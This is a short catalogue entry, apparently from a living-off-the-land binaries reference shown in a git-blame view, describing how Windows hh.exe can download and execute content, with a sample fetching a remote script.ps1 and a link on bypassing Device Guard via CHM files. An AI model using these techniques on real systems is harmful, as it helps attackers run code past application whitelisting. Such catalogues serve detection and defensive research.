2018-04-19 00:06:48 +00:00
|
|
|
## hh.exe
|
|
|
|
|
2018-05-04 06:04:42 +00:00
|
|
|
* Functions: Download, Execute
|
2018-04-19 00:06:48 +00:00
|
|
|
|
|
|
|
```
|
|
|
|
HH.exe http://www.google.com
|
|
|
|
|
2018-05-04 06:04:42 +00:00
|
|
|
HH.exe C:\
|
2018-05-03 14:40:50 +00:00
|
|
|
|
2018-05-04 06:04:42 +00:00
|
|
|
HH.exe c:\windows\system32\calc.exe
|
2018-05-03 14:40:50 +00:00
|
|
|
|
2018-05-04 06:04:42 +00:00
|
|
|
HH.exe http://some.url/script.ps1
|
2018-04-19 00:06:48 +00:00
|
|
|
```
|
|
|
|
|
|
|
|
Acknowledgements:
|
|
|
|
* Oddvar Moe - @oddvarmoe
|
|
|
|
|
|
|
|
Code sample:
|
|
|
|
*
|
|
|
|
|
|
|
|
Resources:
|
|
|
|
* https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
|
|
|
|
|
|
|
|
Full path:
|
|
|
|
```
|
|
|
|
c:\windows\system32\hh.exe
|
|
|
|
c:\windows\sysWOW64\hh.exe
|
|
|
|
```
|
|
|
|
|
|
|
|
Notes:
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|